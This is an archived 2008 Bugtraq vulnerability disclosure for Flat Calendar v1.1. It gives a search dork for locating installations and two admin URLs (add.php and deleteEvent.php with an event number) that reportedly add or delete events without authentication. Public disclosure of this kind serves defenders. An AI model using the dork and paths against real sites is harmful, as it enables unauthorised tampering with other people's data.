Flat Calendar v1.1 Remote Permission Bypass Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Flat Calendar v1.1 Remote Permission Bypass Vulnerability
From: none@xxxxxxxx
Date: 11 Jun 2008 14:08:21 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Flat Calendar v1.1  Remote Permission Bypass Vulnerability

Author : Crackers_Child

Dork   : Flat Calendar: View All > Flat Calendar: View All için 
yakla&#351;&#305;k 654.000 sonuçtan


Exploits:

site.com/calender_path/admin/add.php > Adding New Evetns without admin 
permissions.

site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > 
Deleting Events without admin permissions.

Prev by Date: CORE-2008-0125: CitectSCADA ODBC service vulnerability
Next by Date: phpRaider <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable
Previous by thread: CORE-2008-0125: CitectSCADA ODBC service vulnerability
Next by thread: phpRaider <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable
Index(es):
- Date
- Thread